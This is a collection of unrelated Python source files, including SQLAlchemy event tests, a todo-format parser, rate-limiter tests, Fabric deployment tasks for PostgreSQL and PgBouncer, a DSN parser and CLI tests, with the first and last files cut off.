
    def test_exception_event_ad_hoc_context(self):
        """test that handle_error is called with a context in
        cases where _handle_dbapi_error() is normally called without
        any context.

        """

        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'handle_error', listener)

        nope = Exception("nope")
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise nope

        with engine.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).where(
                            column('foo') == literal('bar', MyType()))
            )

        ctx = listener.mock_calls[0][1][0]
        assert ctx.statement.startswith("SELECT 1 ")
        is_(ctx.is_disconnect, False)
        is_(ctx.original_exception, nope)

    def test_exception_event_non_dbapi_error(self):
        """test that dbapi_error is called with a context in
        cases where DBAPI raises an exception that is not a DBAPI
        exception, e.g. internal errors or encoding problems.

        """
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'handle_error', listener)

        nope = TypeError("I'm not a DBAPI error")
        with engine.connect() as c:
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=nope
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
        ctx = listener.mock_calls[0][1][0]
        eq_(ctx.statement, "select ")
        is_(ctx.is_disconnect, False)
        is_(ctx.original_exception, nope)

    def _test_alter_disconnect(self, orig_error, evt_value):
        engine = engines.testing_engine()

        @event.listens_for(engine, "handle_error")
        def evt(ctx):
            ctx.is_disconnect = evt_value

        with patch.object(engine.dialect, "is_disconnect",
                Mock(return_value=orig_error)):

            with engine.connect() as c:
                try:
                    c.execute("SELECT x FROM nonexistent")
                    assert False
                except tsa.exc.StatementError as st:
                    eq_(st.connection_invalidated, evt_value)

    def test_alter_disconnect_to_true(self):
        self._test_alter_disconnect(False, True)
        self._test_alter_disconnect(True, True)

    def test_alter_disconnect_to_false(self):
        self._test_alter_disconnect(True, False)
        self._test_alter_disconnect(False, False)

class ProxyConnectionTest(fixtures.TestBase):
    """These are the same tests as EngineEventsTest, except using
    the deprecated ConnectionProxy interface.

    """
    __requires__ = 'ad_hoc_engines',
    __prefer_requires__ = 'two_phase_transactions',

    @testing.uses_deprecated(r'.*Use event.listen')
    @testing.fails_on('firebird', 'Data type unknown')
    def test_proxy(self):

        stmts = []
        cursor_stmts = []

        class MyProxy(ConnectionProxy):
            def execute(
                self,
                conn,
                execute,
                clauseelement,
                *multiparams,
                **params
                ):
                stmts.append((str(clauseelement), params, multiparams))
                return execute(clauseelement, *multiparams, **params)

            def cursor_execute(
                self,
                execute,
                cursor,
                statement,
                parameters,
                context,
                executemany,
                ):
                cursor_stmts.append((str(statement), parameters, None))
                return execute(cursor, statement, parameters, context)

        def assert_stmts(expected, received):
            for stmt, params, posn in expected:
                if not received:
                    assert False, "Nothing available for stmt: %s" % stmt
                while received:
                    teststmt, testparams, testmultiparams = \
                        received.pop(0)
                    teststmt = re.compile(r'[\n\t ]+', re.M).sub(' ',
                            teststmt).strip()
                    if teststmt.startswith(stmt) and (testparams
                            == params or testparams == posn):
                        break

        for engine in \
            engines.testing_engine(options=dict(implicit_returning=False,
                                   proxy=MyProxy())), \
            engines.testing_engine(options=dict(implicit_returning=False,
                                   proxy=MyProxy(),
                                   strategy='threadlocal')):
            m = MetaData(engine)
            t1 = Table('t1', m,
                Column('c1', Integer, primary_key=True),
                Column('c2', String(50), default=func.lower('Foo'),
                                            primary_key=True)
            )
            m.create_all()
            try:
                t1.insert().execute(c1=5, c2='some data')
                t1.insert().execute(c1=6)
                eq_(engine.execute('select * from t1').fetchall(), [(5,
                    'some data'), (6, 'foo')])
            finally:
                m.drop_all()
            engine.dispose()
            compiled = [('CREATE TABLE t1', {}, None),
                        ('INSERT INTO t1 (c1, c2)', {'c2': 'some data',
                        'c1': 5}, None), ('INSERT INTO t1 (c1, c2)',
                        {'c1': 6}, None), ('select * from t1', {},
                        None), ('DROP TABLE t1', {}, None)]
            if not testing.against('oracle+zxjdbc'):  # or engine.dialect.pr
                                                      # eexecute_pk_sequence
                                                      # s:
                cursor = [
                    ('CREATE TABLE t1', {}, ()),
                    ('INSERT INTO t1 (c1, c2)', {'c2': 'some data', 'c1'
                     : 5}, (5, 'some data')),
                    ('SELECT lower', {'lower_2': 'Foo'},
                        ('Foo', )),
                    ('INSERT INTO t1 (c1, c2)', {'c2': 'foo', 'c1': 6},
                     (6, 'foo')),
                    ('select * from t1', {}, ()),
                    ('DROP TABLE t1', {}, ()),
                    ]
            else:
                insert2_params = 6, 'Foo'
                if testing.against('oracle+zxjdbc'):
                    insert2_params += (ReturningParam(12), )
                cursor = [('CREATE TABLE t1', {}, ()),
                          ('INSERT INTO t1 (c1, c2)', {'c2': 'some data'
                          , 'c1': 5}, (5, 'some data')),
                          ('INSERT INTO t1 (c1, c2)', {'c1': 6,
                          'lower_2': 'Foo'}, insert2_params),
                          ('select * from t1', {}, ()), ('DROP TABLE t1'
                          , {}, ())]  # bind param name 'lower_2' might
                                      # be incorrect
            assert_stmts(compiled, stmts)
            assert_stmts(cursor, cursor_stmts)

    @testing.uses_deprecated(r'.*Use event.listen')
    def test_options(self):
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go
        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()
        c2 = conn.execution_options(foo='bar')
        eq_(c2._execution_options, {'foo':'bar'})
        c2.execute(select([1]))
        c3 = c2.execution_options(bar='bat')
        eq_(c3._execution_options, {'foo':'bar', 'bar':'bat'})
        eq_(canary, ['execute', 'cursor_execute'])


    @testing.uses_deprecated(r'.*Use event.listen')
    def test_transactional(self):
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go

        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.rollback()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.commit()

        eq_(canary, [
            'begin', 'execute', 'cursor_execute', 'rollback',
            'begin', 'execute', 'cursor_execute', 'commit',
            ])

    @testing.uses_deprecated(r'.*Use event.listen')
    @testing.requires.savepoints
    @testing.requires.two_phase_transactions
    def test_transactional_advanced(self):
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go

        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()

        trans = conn.begin()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.rollback()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.commit()
        trans.rollback()

        trans = conn.begin_twophase()
        conn.execute(select([1]))
        trans.prepare()
        trans.commit()

        canary = [t for t in canary if t not in ('cursor_execute', 'execute')]
        eq_(canary, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )

class DialectEventTest(fixtures.TestBase):
    @contextmanager
    def _run_test(self, retval):
        m1 = Mock()

        m1.do_execute.return_value = retval
        m1.do_executemany.return_value = retval
        m1.do_execute_no_params.return_value = retval
        e = engines.testing_engine(options={"_initialize": False})

        event.listen(e, "do_execute", m1.do_execute)
        event.listen(e, "do_executemany", m1.do_executemany)
        event.listen(e, "do_execute_no_params", m1.do_execute_no_params)

        e.dialect.do_execute = m1.real_do_execute
        e.dialect.do_executemany = m1.real_do_executemany
        e.dialect.do_execute_no_params = m1.real_do_execute_no_params

        def mock_the_cursor(cursor, *arg):
            arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
            return retval

        m1.real_do_execute.side_effect = m1.do_execute.side_effect = mock_the_cursor
        m1.real_do_executemany.side_effect = m1.do_executemany.side_effect = mock_the_cursor
        m1.real_do_execute_no_params.side_effect = m1.do_execute_no_params.side_effect = mock_the_cursor

        with e.connect() as conn:
            yield conn, m1

    def _assert(self, retval, m1, m2, mock_calls):
        eq_(m1.mock_calls, mock_calls)
        if retval:
            eq_(m2.mock_calls, [])
        else:
            eq_(m2.mock_calls, mock_calls)

    def _test_do_execute(self, retval):
        with self._run_test(retval) as (conn, m1):
            result = conn.execute("insert into table foo", {"foo": "bar"})
        self._assert(
            retval,
            m1.do_execute, m1.real_do_execute,
            [call(
                    result.context.cursor,
                    "insert into table foo",
                    {"foo": "bar"}, result.context)]
        )

    def _test_do_executemany(self, retval):
        with self._run_test(retval) as (conn, m1):
            result = conn.execute("insert into table foo",
                            [{"foo": "bar"}, {"foo": "bar"}])
        self._assert(
            retval,
            m1.do_executemany, m1.real_do_executemany,
            [call(
                    result.context.cursor,
                    "insert into table foo",
                    [{"foo": "bar"}, {"foo": "bar"}], result.context)]
        )

    def _test_do_execute_no_params(self, retval):
        with self._run_test(retval) as (conn, m1):
            result = conn.execution_options(no_parameters=True).\
                execute("insert into table foo")
        self._assert(
            retval,
            m1.do_execute_no_params, m1.real_do_execute_no_params,
            [call(
                    result.context.cursor,
                    "insert into table foo", result.context)]
        )

    def _test_cursor_execute(self, retval):
        with self._run_test(retval) as (conn, m1):
            dialect = conn.dialect

            stmt = "insert into table foo"
            params = {"foo": "bar"}
            ctx = dialect.execution_ctx_cls._init_statement(
                            dialect, conn, conn.connection, stmt, [params])

            conn._cursor_execute(ctx.cursor, stmt, params, ctx)

        self._assert(
            retval,
            m1.do_execute, m1.real_do_execute,
            [call(
                    ctx.cursor,
                    "insert into table foo",
                    {"foo": "bar"}, ctx)]
        )

    def test_do_execute_w_replace(self):
        self._test_do_execute(True)

    def test_do_execute_wo_replace(self):
        self._test_do_execute(False)

    def test_do_executemany_w_replace(self):
        self._test_do_executemany(True)

    def test_do_executemany_wo_replace(self):
        self._test_do_executemany(False)

    def test_do_execute_no_params_w_replace(self):
        self._test_do_execute_no_params(True)

    def test_do_execute_no_params_wo_replace(self):
        self._test_do_execute_no_params(False)

    def test_cursor_execute_w_replace(self):
        self._test_cursor_execute(True)

    def test_cursor_execute_wo_replace(self):
        self._test_cursor_execute(False)


"""
``editquality generate_make -h``
::

    Code-generate Makefile from template and configuration

    :Usage:
        generate_make -h | --help
        generate_make
                     [--config=<path>]
                     [--main=<filename>]
                     [--output=<path>]
                     [--templates=<path>]
                     [--debug]

    :Options:
        --config=<path>         Directory to search for configuration files
                                [default: config/]
        --main=<filename>       Override to use a main template other than the
                                default [default: Makefile.j2]
        --output=<path>         Where to write the Makefile output.
                                [default: <stdout>]
        --templates=<path>      Directory to search for input templates.
                                [default: templates/]
        --debug                 Print debug logging

"""

# TODO:
# * make API calls to learn things
# * ores/config has dict merge
# * survey dependency solvers
# https://github.com/ninja-build/ninja/wiki/List-of-generators-producing-ninja-build-files
# ** Still considering: scons, doit, drake, ninja, meson
# ** Don't like so far: waf
# * Where can we store information about samples?
#   Original population rates; how we've distorted them.

import logging
import os.path
import sys

import docopt

from .. import config
from ..codegen import generate

logger = logging.getLogger(__name__)


def main(argv=None):
    args = docopt.docopt(__doc__, argv=argv)

    logging.basicConfig(
        level=logging.DEBUG if args['--debug'] else logging.WARNING,
        format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
    )

    config_path = args["--config"]

    output_f = sys.stdout \
        if args["--output"] == "<stdout>" \
        else open(args["--output"], "w")

    templates_path = args["--templates"]
    main_template_path = args["--main"]
    if not os.path.isabs(main_template_path):
        # Join a filename to the default templates dir.
        main_template_path = os.path.join(templates_path, main_template_path)
    with open(main_template_path, "r") as f:
        main_template = f.read()

    variables = config.load_config(config_path)

    output = generate.generate(variables, templates_path, main_template)
    output_f.write(output)

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.serialization import Model


class Product(Model):

    _required = []

    _attribute_map = {
        'integer': {'key': 'integer', 'type': 'int'},
        'string': {'key': 'string', 'type': 'str'},
    }

    def __init__(self, *args, **kwargs):
        """Product

        :param int integer
        :param str string
        """
        self.integer = None
        self.string = None

        super(Product, self).__init__(*args, **kwargs)

# coding=utf8
"""
Parser for todo format string.

  from todo.parser import parser
  parser.parse(string)  # return an Todo instance

"""

from models import Task
from models import Todo

from ply import lex
from ply import yacc


class TodoLexer(object):
    """
    Lexer for Todo format string.
    Tokens
      ID        e.g. '1.'
      DONE      e.g. '(x)'
      TASK      e.g. 'This is a task'
    """

    tokens = (
        "ID",
        "DONE",
        "TASK",
    )

    t_ignore = "\x20\x09"  # ignore spaces and tabs

    def t_ID(self, t):
        r'\d+\.([uU]|[lL]|[uU][lL]|[lL][uU])?'
        t.value = int(t.value[:-1])
        return t

    def t_DONE(self, t):
        r'(\(x\))'
        return t

    def t_TASK(self, t):
        r'((?!\(x\))).+'
        return t

    def t_newline(self, t):
        r'\n+'
        t.lexer.lineno += len(t.value)

    def t_error(self, t):
        raise SyntaxError(
            "Illegal character: '%s' at Line %d" % (t.value[0], t.lineno)
        )

    def __init__(self):
        self.lexer = lex.lex(module=self)


class TodoParser(object):
    """
    Parser for Todo format string, works with a todo lexer.

    Parse string to Python list
      todo_str = "1. (x) Write email to tom"
      TodoParser().parse(todo_str)
    """

    tokens = TodoLexer.tokens

    def p_error(self, p):
        if p:
            raise SyntaxError(
                "Character '%s' at line %d" % (p.value[0], p.lineno)
            )
        else:
            raise SyntaxError("SyntaxError at EOF")

    def p_start(self, p):
        "start : translation_unit"
        p[0] = self.todo

    def p_translation_unit(self, p):
        """
        translation_unit : translate_task
                         | translation_unit translate_task
                         |
        """
        pass

    def p_translation_task(self, p):
        """
        translate_task : ID DONE TASK
                       | ID TASK
        """
        if len(p) == 4:
            done = True
            content = p[3]
        elif len(p) == 3:
            done = False
            content = p[2]
        task = Task(p[1], content, done)
        self.todo.append(task)

    def __init__(self):
        self.parser = yacc.yacc(module=self, debug=0, write_tables=0)

    def parse(self, data):
        # reset list
        self.todo = Todo()
        return self.parser.parse(data)


lexer = TodoLexer()  # build lexer
parser = TodoParser()  # build parser

import time

import pymemcache.client
import pytest

from limits import RateLimitItemPerMinute, RateLimitItemPerSecond
from limits.storage import MemcachedStorage, storage_from_string
from limits.strategies import (
    FixedWindowElasticExpiryRateLimiter,
    FixedWindowRateLimiter,
)
from tests.utils import fixed_start


@pytest.mark.memcached
@pytest.mark.flaky
class TestMemcachedStorage:
    @pytest.fixture(autouse=True)
    def setup(self, memcached, memcached_cluster):
        self.storage_url = "memcached://localhost:22122"

    def test_init_options(self, mocker):
        constructor = mocker.spy(pymemcache.client, "PooledClient")
        assert storage_from_string(self.storage_url, connect_timeout=1).check()
        assert constructor.call_args[1]["connect_timeout"] == 1

    @fixed_start
    def test_fixed_window(self):
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowRateLimiter(storage)
        per_min = RateLimitItemPerSecond(10)
        start = time.time()
        count = 0

        while time.time() - start < 0.5 and count < 10:
            assert limiter.hit(per_min)
            count += 1
        assert not limiter.hit(per_min)

        while time.time() - start <= 1:
            time.sleep(0.1)
        assert limiter.hit(per_min)

    @fixed_start
    def test_fixed_window_cluster(self):
        storage = MemcachedStorage("memcached://localhost:22122,localhost:22123")
        limiter = FixedWindowRateLimiter(storage)
        per_min = RateLimitItemPerSecond(10)
        start = time.time()
        count = 0

        while time.time() - start < 0.5 and count < 10:
            assert limiter.hit(per_min)
            count += 1
        assert not limiter.hit(per_min)

        while time.time() - start <= 1:
            time.sleep(0.1)
        assert limiter.hit(per_min)

    @fixed_start
    def test_fixed_window_with_elastic_expiry(self):
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowElasticExpiryRateLimiter(storage)
        per_sec = RateLimitItemPerSecond(2, 2)

        assert limiter.hit(per_sec)
        time.sleep(1)
        assert limiter.hit(per_sec)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert limiter.test(per_sec)

    @fixed_start
    def test_fixed_window_with_elastic_expiry_cluster(self):
        storage = MemcachedStorage("memcached://localhost:22122,localhost:22123")
        limiter = FixedWindowElasticExpiryRateLimiter(storage)
        per_sec = RateLimitItemPerSecond(2, 2)

        assert limiter.hit(per_sec)
        time.sleep(1)
        assert limiter.hit(per_sec)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert not limiter.test(per_sec)
        time.sleep(1)
        assert limiter.test(per_sec)

    def test_clear(self):
        storage = MemcachedStorage("memcached://localhost:22122")
        limiter = FixedWindowRateLimiter(storage)
        per_min = RateLimitItemPerMinute(1)
        limiter.hit(per_min)
        assert not limiter.hit(per_min)
        limiter.clear(per_min)
        assert limiter.hit(per_min)

import os
import sys
import tempfile

from fabric.api import run, sudo, env, local, hide, settings
from fabric.contrib.files import append, sed, exists, contains
from fabric.context_managers import prefix
from fabric.operations import get, put
from fabric.context_managers import cd

from fabric.tasks import Task

from fab_deploy.functions import random_password
from fab_deploy.base import postgres as base_postgres

class JoyentMixin(object):
    version_directory_join = ''

    def _get_data_dir(self, db_version):
        # Try to get from svc first
        output = run('svcprop -p config/data postgresql')
        if output.stdout and exists(output.stdout, use_sudo=True):
            return output.stdout
        return base_postgres.PostgresInstall._get_data_dir(self, db_version)

    def _install_package(self, db_version):
        sudo("pkg_add postgresql%s-server" %db_version)
        sudo("pkg_add postgresql%s-replicationtools" %db_version)
        sudo("svcadm enable postgresql")

    def _restart_db_server(self, db_version):
        sudo('svcadm restart postgresql')

    def _stop_db_server(self, db_version):
        sudo('svcadm disable postgresql')

    def _start_db_server(self, db_version):
        sudo('svcadm enable postgresql')

class PostgresInstall(JoyentMixin, base_postgres.PostgresInstall):
    """
    Install postgresql on server

    install postgresql package;
    enable postgres access from localhost without password;
    enable all other user access from other machines with password;
    setup a few parameters related with streaming replication;
    database server listen to all machines '*';
    create a user for database with password.
    """

    name = 'master_setup'
    db_version = '9.1'

class SlaveSetup(JoyentMixin, base_postgres.SlaveSetup):
    """
    Set up master-slave streaming replication: slave node
    """

    name = 'slave_setup'

class PGBouncerInstall(Task):
    """
    Set up PGBouncer on a database server
    """

    name = 'setup_pgbouncer'

    pgbouncer_src = 'http://pkgsrc.smartos.org/packages/SmartOS/2012Q2/databases/pgbouncer-1.4.2.tgz'
    pkg_name = 'pgbouncer-1.4.2.tgz'
    config_dir = '/etc/opt/pkg'

    config = {
        '*':              'host=127.0.0.1',
        'logfile':        '/var/log/pgbouncer/pgbouncer.log',
        'listen_addr':    '*',
        'listen_port':    '6432',
        'unix_socket_dir': '/tmp',
        'auth_type':      'md5',
        'auth_file':      '%s/pgbouncer.userlist' %config_dir,
        'pool_mode':      'session',
        'admin_users':    'postgres',
        'stats_users':    'postgres',
        }

    def install_package(self):
        sudo('pkg_add libevent')
        with cd('/tmp'):
            run('wget %s' %self.pgbouncer_src)
            sudo('pkg_add %s' %self.pkg_name)

    def _setup_parameter(self, file_name, **kwargs):
        for key, value in kwargs.items():
            origin = "%s =" %key
            new = "%s = %s" %(key, value)
            sudo('sed -i "/%s/ c\%s" %s' %(origin, new, file_name))

    def _get_passwd(self, username):
        with hide('output'):
            string = run('echo "select usename, passwd from pg_shadow where '
                         'usename=\'%s\' order by 1" | sudo su postgres -c '
                         '"psql"' %username)

        user, passwd = string.split('\n')[2].split('|')
        user = user.strip()
        passwd = passwd.strip()

        __, tmp_name = tempfile.mkstemp()
        fn = open(tmp_name, 'w')
        fn.write('"%s" "%s" ""\n' %(user, passwd))
        fn.close()
        put(tmp_name, '%s/pgbouncer.userlist'%self.config_dir, use_sudo=True)
        local('rm %s' %tmp_name)

    def _get_username(self, section=None):
        try:
            names = env.config_object.get_list(section, env.config_object.USERNAME)
            username = names[0]
        except:
            print ('You must first set up a database server on this machine, '
                   'and create a database user')
            raise
        return username

    def run(self, section=None):
        """
        """

        sudo('mkdir -p /opt/pkg/bin')
        sudo("ln -sf /opt/local/bin/awk /opt/pkg/bin/nawk")
        sudo("ln -sf /opt/local/bin/sed /opt/pkg/bin/nbsed")

        self.install_package()

        svc_method = os.path.join(env.configs_dir, 'pgbouncer.xml')
        put(svc_method, self.config_dir, use_sudo=True)

        home = run('bash -c "echo ~postgres"')
        bounce_home = os.path.join(home, 'pgbouncer')

        pidfile = os.path.join(bounce_home, 'pgbouncer.pid')
        self._setup_parameter('%s/pgbouncer.ini' %self.config_dir,
                              pidfile=pidfile, **self.config)

        if not section:
            section = 'db-server'
        username = self._get_username(section)
        self._get_passwd(username)
        # postgres should be the owner of these config files
        sudo('chown -R postgres:postgres %s' %self.config_dir)

        sudo('mkdir -p %s' % bounce_home)
        sudo('chown postgres:postgres %s' % bounce_home)

        sudo('mkdir -p /var/log/pgbouncer')
        sudo('chown postgres:postgres /var/log/pgbouncer')

        # set up log
        sudo('logadm -C 3 -p1d -c -w /var/log/pgbouncer/pgbouncer.log -z 1')
        run('svccfg import %s/pgbouncer.xml' %self.config_dir)

        # start pgbouncer
        sudo('svcadm enable pgbouncer')

setup = PostgresInstall()
slave_setup = SlaveSetup()
setup_pgbouncer = PGBouncerInstall()

"""
Gauged
https://github.com/chriso/gauged (MIT Licensed)
Copyright 2014 (c) Chris O'Hara <cohara87@gmail.com>
"""

from urlparse import urlparse, parse_qsl
from urllib import unquote
from .mysql import MySQLDriver
from .sqlite import SQLiteDriver
from .postgresql import PostgreSQLDriver


def parse_dsn(dsn_string):
    """Parse a connection string and return the associated driver"""
    dsn = urlparse(dsn_string)
    scheme = dsn.scheme.split('+')[0]
    username = password = host = port = None
    host = dsn.netloc
    if '@' in host:
        username, host = host.split('@')
        if ':' in username:
            username, password = username.split(':')
            password = unquote(password)
        username = unquote(username)
    if ':' in host:
        host, port = host.split(':')
        port = int(port)
    database = dsn.path.split('?')[0][1:]
    query = dsn.path.split('?')[1] if '?' in dsn.path else dsn.query
    kwargs = dict(parse_qsl(query, True))
    if scheme == 'sqlite':
        return SQLiteDriver, [dsn.path], {}
    elif scheme == 'mysql':
        kwargs['user'] = username or 'root'
        kwargs['db'] = database
        if port:
            kwargs['port'] = port
        if host:
            kwargs['host'] = host
        if password:
            kwargs['passwd'] = password
        return MySQLDriver, [], kwargs
    elif scheme == 'postgresql':
        kwargs['user'] = username or 'postgres'
        kwargs['database'] = database
        if port:
            kwargs['port'] = port
        if 'unix_socket' in kwargs:
            kwargs['host'] = kwargs.pop('unix_socket')
        elif host:
            kwargs['host'] = host
        if password:
            kwargs['password'] = password
        return PostgreSQLDriver, [], kwargs
    else:
        raise ValueError('Unknown driver %s' % dsn_string)


def get_driver(dsn_string):
    driver, args, kwargs = parse_dsn(dsn_string)
    return driver(*args, **kwargs)

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ibtokin.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)

import boto
import mock
import moto
import tempfile
import unittest

from click.testing import CliRunner

from rubberjackcli.click import rubberjack


class CLITests(unittest.TestCase):

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy(self, cav, ue):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', tmp.name], catch_exceptions=False)

            self.assertEquals(result.exit_code, 0, result.output)

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_promote(self, ue, de):
        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': 'laterpay-devnull-live',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'old',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'new',
                        },
                    ],
                },
            },
        }

        CliRunner().invoke(rubberjack, ['promote'], catch_exceptions=False)

    @moto.mock_s3_deprecated
    @mock.patch('sys.exit')
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_promoting_same_version(self, ue, de, se):
        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': 'laterpay-devnull-live',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'same',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'same',
                        },
                    ],
                },
            },
        }

        CliRunner().invoke(rubberjack, ['promote'], catch_exceptions=False)

        self.assertTrue(se.called)

    @moto.mock_s3_deprecated
    def test_sigv4(self):
        CliRunner().invoke(rubberjack, ['--sigv4-host', 'foo', 'deploy'], catch_exceptions=False)

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_to_custom_environment(self, ue, cav):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', '--environment', 'wibble', tmp.name], catch_exceptions=False)

            self.assertEquals(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 1, "update_environment wasn't called, but it should")

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_without_updating_the_environment(self, ue, cav):
        s3 = boto.connect_s3()
        s3.create_bucket("laterpay-rubberjack-ebdeploy")  # FIXME Remove hardcoded bucket name

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['deploy', '--no-update-environment', tmp.name], catch_exceptions=False)

            self.assertEquals(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 0, "update_environment was called, but it shouldn't")

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.create_application_version')
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    def test_deploy_to_custom_bucket(self, ue, cav):
        bucket_name = 'rbbrjck-test'
        s3 = boto.connect_s3()
        s3.create_bucket(bucket_name)

        with tempfile.NamedTemporaryFile() as tmp:
            result = CliRunner().invoke(rubberjack, ['--bucket', bucket_name, 'deploy', tmp.name], catch_exceptions=False)

            self.assertEquals(result.exit_code, 0, result.output)

        self.assertEqual(cav.call_count, 1, "create_application_version wasn't called, but it should")
        self.assertEqual(ue.call_count, 1, "update_environment wasn't called, but it should")

        _, cav_kwargs = cav.call_args
        self.assertEqual(bucket_name, cav_kwargs['s3_bucket'])

    @moto.mock_s3_deprecated
    @mock.patch('boto.beanstalk.layer1.Layer1.update_environment')
    @mock.patch('boto.beanstalk.layer1.Layer1.describe_environments')
    def test_promote_to_custom_environment(self, de, ue):
        CUSTOM_TO_ENVIRONMENT = "loremipsum"

        de.return_value = {
            'DescribeEnvironmentsResponse': {
                'DescribeEnvironmentsResult': {
                    'Environments': [
                        {
                            'EnvironmentName': CUSTOM_TO_ENVIRONMENT,
                            'VersionLabel': 'old',
                        },
                        {
                            'EnvironmentName': 'laterpay-devnull-dev',  # FIXME Remove hardcoded EnvName
                            'VersionLabel': 'new',
                        },
                    ],
                },
            },
        }

        result = CliRunner().invoke(rubberjack, ['promote', '--to-environment', CUSTOM_TO_ENVIRONMENT], catch_exceptions=False)
        self.assertEquals(result.exit_code, 0, result.output)

from __future__ import absolute_import, division, print_function
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
from __future__ import with_statement
import pickle
import os
import sys
from io import UnsupportedOperation

import _pytest._code
import py
import pytest
import contextlib

from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import EXIT_NOTESTSCOLLECTED


needsosdup = pytest.mark.xfail("not hasattr(os, 'dup')")

if sys.version_info >= (3, 0):
    def tobytes(obj):
        if isinstance(obj, str):
            obj = obj.encode('UTF-8')
        assert isinstance(obj, bytes)
        return obj

    def totext(obj):
        if isinstance(obj, bytes):
            obj = str(obj, 'UTF-8')
        assert isinstance(obj, str)
        return obj
else:
    def tobytes(obj):
        if isinstance(obj, unicode):
            obj = obj.encode('UTF-8')
        assert isinstance(obj, str)
        return obj

    def totext(obj):
        if isinstance(obj, str):
            obj = unicode(obj, 'UTF-8')
        assert isinstance(obj, unicode)
        return obj


def oswritebytes(fd, obj):
    os.write(fd, tobytes(obj))


